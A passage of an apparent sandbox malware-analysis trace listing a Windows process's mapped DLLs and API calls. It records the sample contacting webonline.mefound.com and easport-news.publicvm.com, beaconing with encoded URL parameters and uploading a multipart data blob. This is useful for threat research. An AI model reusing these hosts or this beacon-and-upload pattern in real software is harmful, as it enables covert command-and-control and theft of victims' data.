filename = "" Region: id = 3831 start_va = 0x73750000 end_va = 0x737a1fff entry_point = 0x73750000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 3832 start_va = 0x73730000 end_va = 0x73744fff entry_point = 0x73730000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 3833 start_va = 0x74650000 end_va = 0x7465cfff entry_point = 0x74650000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3834 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3835 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3836 start_va = 0x1a00000 end_va = 0x1afffff entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 3837 start_va = 0x72d70000 end_va = 0x72d75fff entry_point = 0x72d70000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 3838 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3839 start_va = 0x75e20000 end_va = 0x75e2bfff entry_point = 0x75e20000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3840 start_va = 0x1b80000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 3841 start_va = 0x74240000 end_va = 0x7424ffff entry_point = 0x74240000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3842 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3843 start_va = 0x1c80000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3844 start_va = 0x18a0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 3845 start_va = 0x18a0000 end_va = 0x191ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 3846 start_va = 0x1920000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x0000000001920000" filename = "" Region: id = 3847 start_va = 0x6f850000 end_va = 0x6f855fff entry_point = 0x6f850000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3848 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 3849 start_va = 0x1c80000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3850 start_va = 0x1e30000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3851 start_va = 0x1f40000 end_va = 0x203ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 3852 start_va = 0x77600000 end_va = 0x77682fff entry_point = 0x77600000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3853 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 3854 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 3855 start_va = 0x70600000 end_va = 0x70659fff entry_point = 0x70600000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3856 start_va = 0x1e40000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 3857 start_va = 0x75740000 end_va = 0x7577afff entry_point = 0x75740000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3858 start_va = 0x759a0000 end_va = 0x759b5fff entry_point = 0x759a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3859 start_va = 0x75ec0000 end_va = 0x75ecdfff entry_point = 0x75ec0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3860 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 3861 start_va = 0x6efd0000 end_va = 0x6efd7fff entry_point = 0x6efd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3862 start_va = 0x748c0000 end_va = 0x748cffff entry_point = 0x748c0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3863 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3864 start_va = 0x74890000 end_va = 0x748a1fff entry_point = 0x74890000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3865 start_va = 0x75960000 end_va = 0x7599bfff entry_point = 0x75960000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3866 start_va = 0x74880000 end_va = 0x74887fff entry_point = 0x74880000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3867 start_va = 0x754b0000 end_va = 0x754b4fff entry_point = 0x754b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3868 start_va = 0x75950000 end_va = 0x75955fff entry_point = 0x75950000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3869 start_va = 0x73fe0000 end_va = 0x74017fff entry_point = 0x73fe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3870 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 3871 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3872 start_va = 0x75420000 end_va = 0x75428fff entry_point = 0x75420000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3873 start_va = 0x230000 end_va = 0x236fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3874 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 3875 start_va = 0x670000 end_va = 0x677fff entry_point = 0x670000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 3877 start_va = 0x21a0000 end_va = 0x229ffff entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 3878 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Thread: id = 215 os_tid = 0x7e8 Thread: id = 216 os_tid = 0x5f0 [0110.274] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0110.274] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x77720000 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="realloc") returned 0x7772b10d [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="sprintf") returned 0x7773d354 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="srand") returned 0x7772f757 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="rand") returned 0x7772c070 [0110.274] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="_vsnprintf") returned 0x7772d1a8 [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="strtok") returned 0x7772df1f [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="strcmp") returned 0x77738b11 [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0110.275] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="CreateNamedPipeW") returned 0x7620270f [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileW") returned 0x7621cc56 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="SetNamedPipeHandleState") returned 0x7622f420 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="SetEvent") returned 0x7621bccc [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="GetOverlappedResult") returned 0x76212f04 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="ConnectNamedPipe") returned 0x76202727 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="FlushFileBuffers") returned 0x76207f81 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="DisconnectNamedPipe") returned 0x7622f438 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0110.275] GetProcAddress (hModule=0x761d0000, lpProcName="OpenEventW") returned 0x7621548b [0110.276] GetProcAddress (hModule=0x761d0000, lpProcName="ResetEvent") returned 0x7621bcb4 [0110.276] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemTime") returned 0x7621ced8 [0110.276] GetProcAddress (hModule=0x761d0000, lpProcName="ExitProcess") returned 0x7622214f [0110.276] GetProcAddress (hModule=0x761d0000, lpProcName="SetLastError") returned 0x7621bb08 [0110.276] GetProcAddress (hModule=0x761d0000, lpProcName="OutputDebugStringA") returned 0x7620eb36 [0110.276] LoadLibraryW (lpLibFileName="WinInet.dll") returned 0x76600000 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestExA") returned 0x76691812 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpQueryInfoA") returned 0x7661a33e [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetConnectA") returned 0x766249e9 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetReadFile") returned 0x7661b406 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetWriteFile") returned 0x766346da [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpOpenRequestA") returned 0x76624c7d [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpEndRequestA") returned 0x766345ea [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpAddRequestHeadersA") returned 0x7661dcd2 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="HttpSendRequestA") returned 0x766918f8 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetOpenA") returned 0x7662f18e [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetCloseHandle") returned 0x7661ab49 [0110.285] GetProcAddress (hModule=0x76600000, lpProcName="InternetQueryOptionA") returned 0x76611b56 [0110.286] GetProcAddress (hModule=0x76600000, lpProcName="InternetSetOptionA") returned 0x766175e8 [0110.286] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x77830000 [0110.286] GetProcAddress (hModule=0x77830000, lpProcName="ObtainUserAgentString") returned 0x77861d76 [0110.293] ReadFile (hFile=0x60, lpBuffer=0x54f9c4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x55f9c8, lpOverlapped=0x6a1230) [0110.293] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x55b13c, cbSize=0x55b93c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x55b93c) returned 0x0 [0110.296] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0110.336] InternetConnectA (hInternet=0xcc0004, lpszServerName="webonline.mefound.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0110.336] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x55b940 | out: lpBuffer=0x0, lpdwBufferLength=0x55b940) returned 0 [0110.336] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x6af940, lpdwBufferLength=0x55b940 | out: lpBuffer=0x6af940, lpdwBufferLength=0x55b940) returned 1 [0110.336] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="index/index.php?h=OjoH51%2feH88%3d&d=OjoCBOTAiM86OwjWaegu%2bgIIMtBv7S%2f7CgoH51%2feH886OgfnX95%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0110.337] SetLastError (dwErrCode=0x0) [0110.337] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x55f988, dwBufferLength=0x4) returned 1 [0110.337] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x55f988, dwBufferLength=0x4) returned 1 [0110.337] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x55f988, dwBufferLength=0x4) returned 1 [0110.337] strlen (_Str="Accept: */*") returned 0xb [0110.337] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: */*", dwHeadersLength=0xb, dwModifiers=0x20000000) returned 1 [0110.337] SetLastError (dwErrCode=0x0) [0110.337] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0112.234] GetLastError () returned 0x0 [0112.234] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x55f960, lpdwBufferLength=0x55f95c, lpdwIndex=0x0 | out: lpBuffer=0x55f960*, lpdwBufferLength=0x55f95c*=0x4, lpdwIndex=0x0) returned 1 [0112.234] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0112.234] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0112.234] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0112.245] ReadFile (hFile=0x60, lpBuffer=0x54f9c4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x55f9c8, lpOverlapped=0x6a1230) [0112.245] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x55aad4, cbSize=0x55b2d4 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", cbSize=0x55b2d4) returned 0x0 [0112.245] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0112.245] InternetConnectA (hInternet=0xcc0004, lpszServerName="easport-news.publicvm.com", nServerPort=0x0, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0112.245] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x55b2d8 | out: lpBuffer=0x0, lpdwBufferLength=0x55b2d8) returned 0 [0112.245] InternetQueryOptionA (in: hInternet=0xcc0004, dwOption=0x26, lpBuffer=0x1c80a58, lpdwBufferLength=0x55b2d8 | out: lpBuffer=0x1c80a58, lpdwBufferLength=0x55b2d8) returned 1 [0112.245] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="index/index.php?h=TqFIohTtxkA%3d&d=TKFNQa%2fzUUBOoEeTItv3dXaTfZUk3vZ0fpFIohTtxkBOoUiiFO33dniQfZom2PFwfZF8kiSp93V%2blHyRJtT2dGDLOMU0zeZgboFogjTN5mBugWiCNM3mYM%3d%3d", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4400000, dwContext=0x0) returned 0xcc000c [0112.245] SetLastError (dwErrCode=0x0) [0112.245] GetSystemTime (in: lpSystemTime=0x55f888 | out: lpSystemTime=0x55f888*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xd, wMinute=0x7, wSecond=0x2c, wMilliseconds=0x39f)) [0112.245] srand (_Seed=0x39f) [0112.245] rand () returned 3065 [0112.245] rand () returned 10020 [0112.245] rand () returned 717 [0112.245] rand () returned 26888 [0112.245] sprintf (in: _Dest=0x55f82c, _Format="---------------------------%x%x%x%x" | out: _Dest="---------------------------69082cd2724bf9") returned 41 [0112.245] sprintf (in: _Dest=0x55f6f8, _Format="Content-Type: multipart/form-data; boundary=%s\r\n" | out: _Dest="Content-Type: multipart/form-data; boundary=---------------------------69082cd2724bf9\r\n") returned 87 [0112.245] strlen (_Str="Content-Type: multipart/form-data; boundary=---------------------------69082cd2724bf9\r\n") returned 0x57 [0112.245] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=---------------------------69082cd2724bf9\r\n", dwHeadersLength=0x57, dwModifiers=0x20000000) returned 1 [0112.245] SetLastError (dwErrCode=0x0) [0112.245] sprintf (in: _Dest=0x55f2f8, _Format="--%s\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n" | out: _Dest="-----------------------------69082cd2724bf9\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 133 [0112.245] sprintf (in: _Dest=0x55f4f8, _Format="\r\n--%s--\r\n" | out: _Dest="\r\n-----------------------------69082cd2724bf9--\r\n") returned 49 [0112.245] strlen (_Str="\r\n-----------------------------69082cd2724bf9--\r\n") returned 0x31 [0112.245] strlen (_Str="-----------------------------69082cd2724bf9\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x85 [0112.245] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x55f978, dwBufferLength=0x4) returned 1 [0112.245] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x2, lpBuffer=0x55f978, dwBufferLength=0x4) returned 1 [0112.245] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x55f978, dwBufferLength=0x4) returned 1 [0112.245] HttpSendRequestExA (in: hRequest=0xcc000c, lpBuffersIn=0x55f860, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0112.425] strlen (_Str="-----------------------------69082cd2724bf9\r\nContent-Disposition: form-data; name=\"array\"\r\nContent-Type: application/octet-stream\r\n\r\n") returned 0x85 [0112.425] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x55f2f8*, dwNumberOfBytesToWrite=0x85, lpdwNumberOfBytesWritten=0x55f97c | out: lpBuffer=0x55f2f8*, lpdwNumberOfBytesWritten=0x55f97c*=0x85) returned 1 [0112.425] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x1c80f45*, dwNumberOfBytesToWrite=0xfa4, lpdwNumberOfBytesWritten=0x55f97c | out: lpBuffer=0x1c80f45*, lpdwNumberOfBytesWritten=0x55f97c*=0xfa4) returned 1 [0112.426] strlen (_Str="\r\n-----------------------------69082cd2724bf9--\r\n") returned 0x31 [0112.426] InternetWriteFile (in: hFile=0xcc000c, lpBuffer=0x55f4f8*, dwNumberOfBytesToWrite=0x31, lpdwNumberOfBytesWritten=0x55f97c | out: lpBuffer=0x55f4f8*, lpdwNumberOfBytesWritten=0x55f97c*=0x31) returned 1 [0112.426] HttpEndRequestA (in: hRequest=0xcc000c, lpBuffersOut=0x0, dwFlags=0x8, dwContext=0x0 | out: lpBuffersOut=0x0) returned 1 [0112.796] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x55f89c, lpdwBufferLength=0x55f898, lpdwIndex=0x0 | out: lpBuffer=0x55f89c*, lpdwBufferLength=0x55f898*=0x4, lpdwIndex=0x0) returned 1 [0112.796] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x55f89c, lpdwBufferLength=0x55f898, lpdwIndex=0x0 | out: lpBuffer=0x55f89c*, lpdwBufferLength=0x55f898*=0x4, lpdwIndex=0x0) returned 1 [0112.797] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x55b2f8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x55f97c | out: lpBuffer=0x55b2f8*, lpdwNumberOfBytesRead=0x55f97c*=0x130) returned 1 [0112.797] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x55b2f8, dwNumberOfBytesToRead=0x4000, lpdwNumberOfBytesRead=0x55f97c | out: lpBuffer=0x55b2f8*, lpdwNumberOfBytesRead=0x55f97c*=0x0) returned 1 [0112.797] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0112.797] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0112.797] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0112.803] ReadFile (hFile=0x60, lpBuffer=0x54f9c4, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x55f9c8, lpOverlapped=0x6a1230) Thread: id = 217 os_tid = 0x6b4 Thread: id = 218 os_tid = 0x188 Thread: id = 219 os_tid = 0x2dc Thread: id = 220 os_tid = 0x3b0 Thread: id = 221 os_tid = 0x70c Thread: id = 222 os_tid = 0x438 Thread: id = 223 os_tid = 0x8d8